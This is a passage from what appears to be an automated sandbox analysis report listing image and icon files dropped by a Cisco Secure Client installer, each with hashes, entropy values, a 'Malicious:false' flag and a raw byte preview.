                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_help_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_help_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_help_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_prefs.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_prefs_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_prefs_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toolbar_prefs_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\transition_1.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\transition_2.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\transition_3.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\umbrella_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\umbrella_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\unpinned.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

